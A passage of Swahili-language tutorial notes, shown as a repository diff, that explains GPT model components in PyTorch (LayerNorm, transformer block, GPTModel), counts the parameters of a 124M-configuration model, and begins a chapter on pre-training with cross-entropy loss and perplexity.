- **Mtandao wa FeedForward Kulingana na Nafasi:** Inatumia mtandao wa viwango viwili uliounganishwa kikamilifu kwa kila nafasi tofauti na kwa njia sawa.
 | 
			
		||||
- **Maelezo ya Kiwango:**
 | 
			
		||||
- **Kiwango cha Kwanza cha Mstari:** Kinapanua ukubwa kutoka `emb_dim` hadi `4 * emb_dim`.
 | 
			
		||||
- **Kazi ya GELU:** Inatumia kutokuwa na mstari.
 | 
			
		||||
- **Kiwango cha Pili cha Mstari:** Kinapunguza ukubwa kurudi kwenye `emb_dim`.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Kama unavyoona, mtandao wa Feed Forward unatumia viwango 3. Kiwango cha kwanza ni kiwango cha mstari ambacho kitazidisha ukubwa kwa 4 kwa kutumia uzito wa mstari (vigezo vya kufundisha ndani ya mfano). Kisha, kazi ya GELU inatumika katika vipimo vyote ili kuleta mabadiliko yasiyo ya mstari na kupata uwakilishi mzuri, na hatimaye kiwango kingine cha mstari kinatumika kurudi kwenye ukubwa wa awali.
 | 
			
		||||
 | 
			
		||||
### **Mekaniki ya Umakini wa Vichwa Vingi**
 | 
			
		||||
 | 
			
		||||
Hii tayari imeelezwa katika sehemu ya awali.
 | 
			
		||||
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Umakini wa Kujitenga wa Vichwa Vingi:** Inaruhusu mfano kuzingatia nafasi tofauti ndani ya mlolongo wa ingizo wakati wa kuandika token.
 | 
			
		||||
- **Vipengele Muhimu:**
 | 
			
		||||
- **Maswali, Funguo, Thamani:** Mipango ya mstari ya ingizo, inayotumika kuhesabu alama za umakini.
 | 
			
		||||
- **Vichwa:** Mekaniki nyingi za umakini zinazoendesha kwa sambamba (`num_heads`), kila moja ikiwa na ukubwa mdogo (`head_dim`).
 | 
			
		||||
- **Alama za Umakini:** Zinahesabiwa kama bidhaa ya dot ya maswali na funguo, zimepimwa na kufichwa.
 | 
			
		||||
- **Kuficha:** Mask ya sababu inatumika kuzuia mfano kuzingatia token za baadaye (muhimu kwa mifano ya autoregressive kama GPT).
 | 
			
		||||
- **Uzito wa Umakini:** Softmax ya alama za umakini zilizofichwa na kupimwa.
 | 
			
		||||
- **Vector ya Muktadha:** Jumla yenye uzito ya thamani, kulingana na uzito wa umakini.
 | 
			
		||||
- **Mipango ya Matokeo:** Kiwango cha mstari cha kuunganisha matokeo ya vichwa vyote.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo la mtandao huu ni kupata uhusiano kati ya token katika muktadha sawa. Aidha, token zimegawanywa katika vichwa tofauti ili kuzuia overfitting ingawa uhusiano wa mwisho uliofanywa kwa kila kichwa unachanganywa mwishoni mwa mtandao huu.
 | 
			
		||||
>
 | 
			
		||||
> Aidha, wakati wa mafunzo **mask ya sababu** inatumika ili token za baadaye zisihesabiwe wakati wa kutafuta uhusiano maalum kwa token na **dropout** pia inatumika ili **kuzuia overfitting**.
 | 
			
		||||
 | 
			
		||||
### **Kiwango** Kurekebisha
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class LayerNorm(nn.Module):
 | 
			
		||||
def __init__(self, emb_dim):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.eps = 1e-5 # Prevent division by zero during normalization.
 | 
			
		||||
self.scale = nn.Parameter(torch.ones(emb_dim))
 | 
			
		||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
mean = x.mean(dim=-1, keepdim=True)
 | 
			
		||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
 | 
			
		||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
 | 
			
		||||
return self.scale * norm_x + self.shift
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Layer Normalization:** Mbinu inayotumika kurekebisha ingizo kati ya vipengele (embedding dimensions) kwa kila mfano binafsi katika kundi.
 | 
			
		||||
- **Vipengele:**
 | 
			
		||||
- **`eps`:** Kiwango kidogo (`1e-5`) kinachoongezwa kwenye variance ili kuzuia kugawanya kwa sifuri wakati wa normalization.
 | 
			
		||||
- **`scale` na `shift`:** Vigezo vinavyoweza kujifunza (`nn.Parameter`) vinavyomruhusu modeli kupima na kuhamasisha matokeo yaliyorekebishwa. Vimeanzishwa kuwa moja na sifuri, mtawalia.
 | 
			
		||||
- **Mchakato wa Kurekebisha:**
 | 
			
		||||
- **Hesabu Mean (`mean`):** Hesabu mean ya ingizo `x` kati ya dimension ya embedding (`dim=-1`), ikihifadhi dimension kwa ajili ya broadcasting (`keepdim=True`).
 | 
			
		||||
- **Hesabu Variance (`var`):** Hesabu variance ya `x` kati ya dimension ya embedding, pia ikihifadhi dimension. Kigezo cha `unbiased=False` kinahakikisha kuwa variance inahesabiwa kwa kutumia mhesabu wa biased (kugawanya kwa `N` badala ya `N-1`), ambacho ni sahihi wakati wa kurekebisha juu ya vipengele badala ya sampuli.
 | 
			
		||||
- **Normalize (`norm_x`):** Inapunguza mean kutoka `x` na kugawanya kwa mzizi wa variance pamoja na `eps`.
 | 
			
		||||
- **Scale na Shift:** Inatumia vigezo vinavyoweza kujifunza `scale` na `shift` kwa matokeo yaliyorekebishwa.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Lengo ni kuhakikisha mean ya 0 na variance ya 1 kati ya dimensions zote za token sawa. Lengo hili ni **kuimarisha mafunzo ya mitandao ya neva ya kina** kwa kupunguza mabadiliko ya ndani ya covariate, ambayo inahusisha mabadiliko katika usambazaji wa uhamasishaji wa mtandao kutokana na kubadilisha vigezo wakati wa mafunzo.
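A quick sanity check (assuming the `LayerNorm` class defined above) that, after normalization, each token's features have mean of about 0 and variance of about 1:

```python
import torch

torch.manual_seed(123)
x = torch.rand(2, 4, 768)            # (batch_size, seq_len, emb_dim)
ln = LayerNorm(emb_dim=768)
out = ln(x)

print(out.mean(dim=-1)[0, 0].item())                 # close to 0
print(out.var(dim=-1, unbiased=False)[0, 0].item())  # close to 1
```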
 | 
			
		||||
 | 
			
		||||
### **Transformer Block**
 | 
			
		||||
 | 
			
		||||
_Mifano imeongezwa kama maoni ili kuelewa vyema sura za matrices:_
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
 | 
			
		||||
class TransformerBlock(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.att = MultiHeadAttention(
 | 
			
		||||
d_in=cfg["emb_dim"],
 | 
			
		||||
d_out=cfg["emb_dim"],
 | 
			
		||||
context_length=cfg["context_length"],
 | 
			
		||||
num_heads=cfg["n_heads"],
 | 
			
		||||
dropout=cfg["drop_rate"],
 | 
			
		||||
qkv_bias=cfg["qkv_bias"]
 | 
			
		||||
)
 | 
			
		||||
self.ff = FeedForward(cfg)
 | 
			
		||||
self.norm1 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.norm2 = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
def forward(self, x):
 | 
			
		||||
# x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Shortcut connection for attention block
 | 
			
		||||
shortcut = x  # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.norm1(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.att(x)    # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Shortcut connection for feedforward block
 | 
			
		||||
shortcut = x       # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.norm2(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.ff(x)     # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
 | 
			
		||||
x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
return x  # Output shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
```
 | 
			
		||||
#### **Madhumuni na Ufanisi**
 | 
			
		||||
 | 
			
		||||
- **Muundo wa Tabaka:** Inachanganya umakini wa vichwa vingi, mtandao wa feedforward, urekebishaji wa tabaka, na muunganisho wa ziada.
 | 
			
		||||
- **Urekebishaji wa Tabaka:** Unatumika kabla ya tabaka za umakini na feedforward kwa mafunzo thabiti.
 | 
			
		||||
- **Muunganisho wa Ziada (Njia Fupi):** Ongeza ingizo la tabaka kwa matokeo yake ili kuboresha mtiririko wa gradient na kuwezesha mafunzo ya mitandao yenye kina.
 | 
			
		||||
- **Dropout:** Unatumika baada ya tabaka za umakini na feedforward kwa ajili ya urekebishaji.
 | 
			
		||||
 | 
			
		||||
#### **Ufanisi wa Hatua kwa Hatua**
 | 
			
		||||
 | 
			
		||||
1. **Njia ya Kwanza ya Ziada (Umakini wa Kibinafsi):**
 | 
			
		||||
- **Ingizo (`shortcut`):** Hifadhi ingizo la awali kwa muunganisho wa ziada.
 | 
			
		||||
- **Urekebishaji wa Tabaka (`norm1`):** Rekebisha ingizo.
 | 
			
		||||
- **Umakini wa Vichwa Vingi (`att`):** Tumia umakini wa kibinafsi.
 | 
			
		||||
- **Dropout (`drop_shortcut`):** Tumia dropout kwa urekebishaji.
 | 
			
		||||
- **Ongeza Ziada (`x + shortcut`):** Changanya na ingizo la awali.
 | 
			
		||||
2. **Njia ya Pili ya Ziada (FeedForward):**
 | 
			
		||||
- **Ingizo (`shortcut`):** Hifadhi ingizo lililosasishwa kwa muunganisho wa ziada unaofuata.
 | 
			
		||||
- **Urekebishaji wa Tabaka (`norm2`):** Rekebisha ingizo.
 | 
			
		||||
- **Mtandao wa FeedForward (`ff`):** Tumia mabadiliko ya feedforward.
 | 
			
		||||
- **Dropout (`drop_shortcut`):** Tumia dropout.
 | 
			
		||||
- **Ongeza Ziada (`x + shortcut`):** Changanya na ingizo kutoka kwa njia ya kwanza ya ziada.
 | 
			
		||||
 | 
			
		||||
> [!NOTE]
 | 
			
		||||
> Block ya transformer inakusanya mitandao yote pamoja na kutumia **urekebishaji** na **dropouts** kuboresha utulivu wa mafunzo na matokeo.\
 | 
			
		||||
> Kumbuka jinsi dropouts zinavyofanywa baada ya matumizi ya kila mtandao wakati urekebishaji unatumika kabla.
 | 
			
		||||
>
 | 
			
		||||
> Zaidi ya hayo, inatumia njia fupi ambazo zinajumuisha **kuongeza matokeo ya mtandao na ingizo lake**. Hii husaidia kuzuia tatizo la gradient inayopotea kwa kuhakikisha kwamba tabaka za mwanzo zinachangia "kiasi" sawa na zile za mwisho.
 | 
			
		||||
 | 
			
		||||
### **GPTModel**
 | 
			
		||||
 | 
			
		||||
_Mifano imeongezwa kama maelezo ili kuelewa vyema mifano ya matrices:_
 | 
			
		||||
```python
 | 
			
		||||
# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 | 
			
		||||
class GPTModel(nn.Module):
 | 
			
		||||
def __init__(self, cfg):
 | 
			
		||||
super().__init__()
 | 
			
		||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
 | 
			
		||||
# shape: (vocab_size, emb_dim)
 | 
			
		||||
 | 
			
		||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
 | 
			
		||||
# shape: (context_length, emb_dim)
 | 
			
		||||
 | 
			
		||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
 | 
			
		||||
 | 
			
		||||
self.trf_blocks = nn.Sequential(
 | 
			
		||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
 | 
			
		||||
)
 | 
			
		||||
# Stack of TransformerBlocks
 | 
			
		||||
 | 
			
		||||
self.final_norm = LayerNorm(cfg["emb_dim"])
 | 
			
		||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
 | 
			
		||||
# shape: (emb_dim, vocab_size)
 | 
			
		||||
 | 
			
		||||
def forward(self, in_idx):
 | 
			
		||||
# in_idx shape: (batch_size, seq_len)
 | 
			
		||||
batch_size, seq_len = in_idx.shape
 | 
			
		||||
 | 
			
		||||
# Token embeddings
 | 
			
		||||
tok_embeds = self.tok_emb(in_idx)
 | 
			
		||||
# shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Positional embeddings
 | 
			
		||||
pos_indices = torch.arange(seq_len, device=in_idx.device)
 | 
			
		||||
# shape: (seq_len,)
 | 
			
		||||
pos_embeds = self.pos_emb(pos_indices)
 | 
			
		||||
# shape: (seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
# Add token and positional embeddings
 | 
			
		||||
x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
 | 
			
		||||
# x shape: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.drop_emb(x)  # Dropout applied
 | 
			
		||||
# x shape remains: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.trf_blocks(x)  # Pass through Transformer blocks
 | 
			
		||||
# x shape remains: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
x = self.final_norm(x)  # Final LayerNorm
 | 
			
		||||
# x shape remains: (batch_size, seq_len, emb_dim)
 | 
			
		||||
 | 
			
		||||
logits = self.out_head(x)  # Project to vocabulary size
 | 
			
		||||
# logits shape: (batch_size, seq_len, vocab_size)
 | 
			
		||||
 | 
			
		||||
return logits  # Output shape: (batch_size, seq_len, vocab_size)
 | 
			
		||||
```
 | 
			
		||||
#### **Purpose and Functionality**

- **Embedding Layers:**
  - **Token Embeddings (`tok_emb`):** Converts token indices into embeddings. As a reminder, these are the weights given to each dimension of each token in the vocabulary.
  - **Positional Embeddings (`pos_emb`):** Adds positional information to the embeddings to capture the order of the tokens. As a reminder, these are the weights given to a token according to its position in the text.
- **Dropout (`drop_emb`):** Applied to the embeddings for regularization.
- **Transformer Blocks (`trf_blocks`):** A stack of `n_layers` transformer blocks to process the embeddings.
- **Final Normalization (`final_norm`):** Layer normalization before the output layer.
- **Output Layer (`out_head`):** Projects the final hidden states to the vocabulary size to produce the logits for prediction.

> [!NOTE]
> The goal of this class is to use all the other networks mentioned before to **predict the next token in a sequence**, which is fundamental for tasks like text generation.
>
> Note how it will **use as many transformer blocks as indicated**, and that each transformer block uses one multi-head attention net, one feed-forward net and several normalizations. So if 12 transformer blocks are used, multiply this by 12.
>
> Moreover, a **normalization** layer is added **before** the **output**, and a final linear layer is applied at the end to get the results with the proper dimensions. Note how each final vector has the size of the vocabulary in use. That's because it tries to get a probability per possible token inside the vocabulary.

## Number of Parameters to Train

Having the GPT structure defined, it's possible to find out the number of parameters to train:

```python
GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size
    "context_length": 1024, # Context length
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate
    "qkv_bias": False       # Query-Key-Value bias
}

model = GPTModel(GPT_CONFIG_124M)
total_params = sum(p.numel() for p in model.parameters())
print(f"Total number of parameters: {total_params:,}")
# Total number of parameters: 163,009,536
```

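Before diving into the parameter breakdown, a minimal sanity check of the output shape (reusing the `model` instantiated above; the dummy batch below is just an illustration, not part of the original notebook) confirms the point from the earlier note that each position gets one logit per vocabulary token:

```python
import torch

# Hypothetical dummy batch of token ids: batch_size=2, seq_len=10
dummy_batch = torch.randint(0, GPT_CONFIG_124M["vocab_size"], (2, 10))

logits = model(dummy_batch)
print(logits.shape)  # torch.Size([2, 10, 50257]) -> (batch_size, seq_len, vocab_size)
```
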
### **Step-by-Step Calculation**

#### **1. Embedding Layers: Token Embedding & Position Embedding**

- **Layer:** `nn.Embedding(vocab_size, emb_dim)`
- **Parameters:** `vocab_size * emb_dim`

```python
token_embedding_params = 50257 * 768  # = 38,597,376
```

- **Layer:** `nn.Embedding(context_length, emb_dim)`
- **Parameters:** `context_length * emb_dim`

```python
position_embedding_params = 1024 * 768  # = 786,432
```

**Total Embedding Parameters**

```python
embedding_params = token_embedding_params + position_embedding_params
# embedding_params = 38,597,376 + 786,432 = 39,383,808
```

#### **2. Transformer Blocks**

There are 12 transformer blocks, so we will calculate the parameters for one block and then multiply by 12.

**Parameters per Transformer Block**

**a. Multi-Head Attention**

- **Components:**
  - **Query Linear Layer (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Key Linear Layer (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Value Linear Layer (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
  - **Output Projection (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
- **Calculations:**

  - **Each of `W_query`, `W_key`, `W_value`:**

    ```python
    qkv_params = emb_dim * emb_dim  # = 768 * 768 = 589,824
    ```

    Since there are three such layers:

    ```python
    total_qkv_params = 3 * qkv_params  # = 3 * 589,824 = 1,769,472
    ```

  - **Output Projection (`out_proj`):**

    ```python
    out_proj_params = (emb_dim * emb_dim) + emb_dim  # = (768 * 768) + 768 = 590,592
    ```

  - **Total Multi-Head Attention Parameters:**

    ```python
    mha_params = total_qkv_params + out_proj_params
    # mha_params = 1,769,472 + 590,592 = 2,360,064
    ```

**b. FeedForward Network**

- **Components:**
  - **First Linear Layer:** `nn.Linear(emb_dim, 4 * emb_dim)`
  - **Second Linear Layer:** `nn.Linear(4 * emb_dim, emb_dim)`
- **Calculations:**

  - **First Linear Layer:**

    ```python
    ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
    # ff_first_layer_params = (768 * 3072) + 3072 = 2,362,368
    ```

  - **Second Linear Layer:**

    ```python
    ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
    # ff_second_layer_params = (3072 * 768) + 768 = 2,360,064
    ```

  - **Total FeedForward Parameters:**

    ```python
    ff_params = ff_first_layer_params + ff_second_layer_params
    # ff_params = 2,362,368 + 2,360,064 = 4,722,432
    ```

**c. Layer Normalizations**

- **Components:**
  - Two `LayerNorm` instances per block.
  - Each `LayerNorm` has `2 * emb_dim` parameters (scale and shift).
- **Calculations:**

  ```python
  layer_norm_params_per_block = 2 * (2 * emb_dim)  # = 2 * (2 * 768) = 3,072
  ```

**d. Total Parameters per Transformer Block**

```python
params_per_block = mha_params + ff_params + layer_norm_params_per_block
# params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
```

**Total Parameters for All Transformer Blocks**

```python
total_transformer_blocks_params = params_per_block * n_layers
# total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
```

#### **3. Final Layers**

**a. Final Layer Normalization**

- **Parameters:** `2 * emb_dim` (scale and shift)

```python
final_layer_norm_params = 2 * 768  # = 1,536
```

**b. Output Projection Layer (`out_head`)**

- **Layer:** `nn.Linear(emb_dim, vocab_size, bias=False)`
- **Parameters:** `emb_dim * vocab_size`

```python
output_projection_params = 768 * 50257  # = 38,597,376
```

#### **4. Putting It All Together**

```python
total_params = (
    embedding_params +
    total_transformer_blocks_params +
    final_layer_norm_params +
    output_projection_params
)
# total_params = 39,383,808 + 85,026,816 + 1,536 + 38,597,376 = 163,009,536
```

## Generate Text

Having a model that predicts the next token like the previous one, it's only needed to take the last token values from the output (as they will be the ones of the predicted token), which will be a **value per entry in the vocabulary**, and then use the `softmax` function to normalize the dimensions into probabilities that sum to 1, and then get the index of the largest entry, which will be the index of the word inside the vocabulary.

Code from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):

```python
def generate_text_simple(model, idx, max_new_tokens, context_size):
    # idx is (batch, n_tokens) array of indices in the current context
    for _ in range(max_new_tokens):

        # Crop current context if it exceeds the supported context size
        # E.g., if LLM supports only 5 tokens, and the context size is 10
        # then only the last 5 tokens are used as context
        idx_cond = idx[:, -context_size:]

        # Get the predictions
        with torch.no_grad():
            logits = model(idx_cond)

        # Focus only on the last time step
        # (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
        logits = logits[:, -1, :]

        # Apply softmax to get probabilities
        probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)

        # Get the idx of the vocab entry with the highest probability value
        idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)

        # Append sampled index to the running sequence
        idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)

    return idx


start_context = "Hello, I am"

encoded = tokenizer.encode(start_context)
print("encoded:", encoded)

encoded_tensor = torch.tensor(encoded).unsqueeze(0)
print("encoded_tensor.shape:", encoded_tensor.shape)

model.eval()  # disable dropout

out = generate_text_simple(
    model=model,
    idx=encoded_tensor,
    max_new_tokens=6,
    context_size=GPT_CONFIG_124M["context_length"]
)

print("Output:", out)
print("Output length:", len(out[0]))
```

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,970 +0,0 @@
# 6. Pre-training & Loading models

## Text Generation

In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.

As we already predicted some tokens in the previous examples, it's possible to reuse that function for this purpose.

> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this, the previous LLM architecture will be used with some loops going over the data sets, using the defined loss function and optimizer to train all the parameters of the model.

## Text Evaluation

In order to perform a correct training, it's needed to check the predictions obtained against the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.

In order to maximize the probability of the correct token, the weights of the model must be modified so that its probability is maximised. The update of the weights is done via **backpropagation**. This requires a **loss function to minimize**. In this case, the function will be the **difference between the performed prediction and the desired one**.

However, instead of working with the raw probabilities, it will work with their logarithm. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, the targets being the input shifted by one position, so the first 4 targets are already part of the input and the fifth is the newly predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input, the model doesn't know this) with 5 expected tokens and therefore 5 probabilities to maximize.

Therefore, after taking the natural logarithm of each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and that's the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:

<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>

Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
For example, a perplexity value of 48,725 means that when it needs to predict a token, it's unsure about which among the 48,725 tokens in the vocabulary is the correct one.

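As a minimal sketch of these two metrics (the toy `logits` and `targets` below are illustrative, not from the original notebook), cross entropy and perplexity can be computed directly with PyTorch:

```python
import torch
import torch.nn.functional as F

# Hypothetical toy example: 2 positions over a 5-token vocabulary
logits = torch.tensor([[2.0, 0.5, 0.1, -1.0, 0.0],
                       [0.2, 1.5, -0.3, 0.0, 0.7]])
targets = torch.tensor([0, 1])  # expected token ids

# Cross entropy = mean of -log(probability assigned to the correct token)
loss = F.cross_entropy(logits, targets)

# Equivalent manual computation
probs = torch.softmax(logits, dim=-1)
manual = -torch.log(probs[range(len(targets)), targets]).mean()

# Perplexity is just the exponential of the cross-entropy loss
perplexity = torch.exp(loss)

print(loss.item(), manual.item(), perplexity.item())
```
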
## Pre-Train Example

This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb), sometimes slightly modified.

<details>

<summary>Previous code used here but already explained in previous sections</summary>

```python
"""
This is code explained before so it won't be explained again
"""

import tiktoken
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader


class GPTDatasetV1(Dataset):
    def __init__(self, txt, tokenizer, max_length, stride):
        self.input_ids = []
        self.target_ids = []

        # Tokenize the entire text
        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})

        # Use a sliding window to chunk the book into overlapping sequences of max_length
        for i in range(0, len(token_ids) - max_length, stride):
            input_chunk = token_ids[i:i + max_length]
            target_chunk = token_ids[i + 1: i + max_length + 1]
            self.input_ids.append(torch.tensor(input_chunk))
            self.target_ids.append(torch.tensor(target_chunk))

    def __len__(self):
        return len(self.input_ids)

    def __getitem__(self, idx):
        return self.input_ids[idx], self.target_ids[idx]


def create_dataloader_v1(txt, batch_size=4, max_length=256,
                         stride=128, shuffle=True, drop_last=True, num_workers=0):
    # Initialize the tokenizer
    tokenizer = tiktoken.get_encoding("gpt2")

    # Create dataset
    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)

    # Create dataloader
    dataloader = DataLoader(
        dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)

    return dataloader


class MultiHeadAttention(nn.Module):
    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
        super().__init__()
        assert d_out % num_heads == 0, "d_out must be divisible by n_heads"

        self.d_out = d_out
        self.num_heads = num_heads
        self.head_dim = d_out // num_heads  # Reduce the projection dim to match desired output dim

        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
        self.dropout = nn.Dropout(dropout)
        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))

    def forward(self, x):
        b, num_tokens, d_in = x.shape

        keys = self.W_key(x)  # Shape: (b, num_tokens, d_out)
        queries = self.W_query(x)
        values = self.W_value(x)

        # We implicitly split the matrix by adding a `num_heads` dimension
        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)

        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
        keys = keys.transpose(1, 2)
        queries = queries.transpose(1, 2)
        values = values.transpose(1, 2)

        # Compute scaled dot-product attention (aka self-attention) with a causal mask
        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head

        # Original mask truncated to the number of tokens and converted to boolean
        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]

        # Use the mask to fill attention scores
        attn_scores.masked_fill_(mask_bool, -torch.inf)

        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
        attn_weights = self.dropout(attn_weights)

        # Shape: (b, num_tokens, num_heads, head_dim)
        context_vec = (attn_weights @ values).transpose(1, 2)

        # Combine heads, where self.d_out = self.num_heads * self.head_dim
        context_vec = context_vec.reshape(b, num_tokens, self.d_out)
        context_vec = self.out_proj(context_vec)  # optional projection

        return context_vec


class LayerNorm(nn.Module):
    def __init__(self, emb_dim):
        super().__init__()
        self.eps = 1e-5
        self.scale = nn.Parameter(torch.ones(emb_dim))
        self.shift = nn.Parameter(torch.zeros(emb_dim))

    def forward(self, x):
        mean = x.mean(dim=-1, keepdim=True)
        var = x.var(dim=-1, keepdim=True, unbiased=False)
        norm_x = (x - mean) / torch.sqrt(var + self.eps)
        return self.scale * norm_x + self.shift


class GELU(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return 0.5 * x * (1 + torch.tanh(
            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
            (x + 0.044715 * torch.pow(x, 3))
        ))


class FeedForward(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
            GELU(),
            nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
        )

    def forward(self, x):
        return self.layers(x)


class TransformerBlock(nn.Module):
    def __init__(self, cfg):
        super().__init__()
        self.att = MultiHeadAttention(
            d_in=cfg["emb_dim"],
            d_out=cfg["emb_dim"],
            context_length=cfg["context_length"],
            num_heads=cfg["n_heads"],
            dropout=cfg["drop_rate"],
            qkv_bias=cfg["qkv_bias"])
        self.ff = FeedForward(cfg)
        self.norm1 = LayerNorm(cfg["emb_dim"])
        self.norm2 = LayerNorm(cfg["emb_dim"])
        self.drop_shortcut = nn.Dropout(cfg["drop_rate"])

    def forward(self, x):
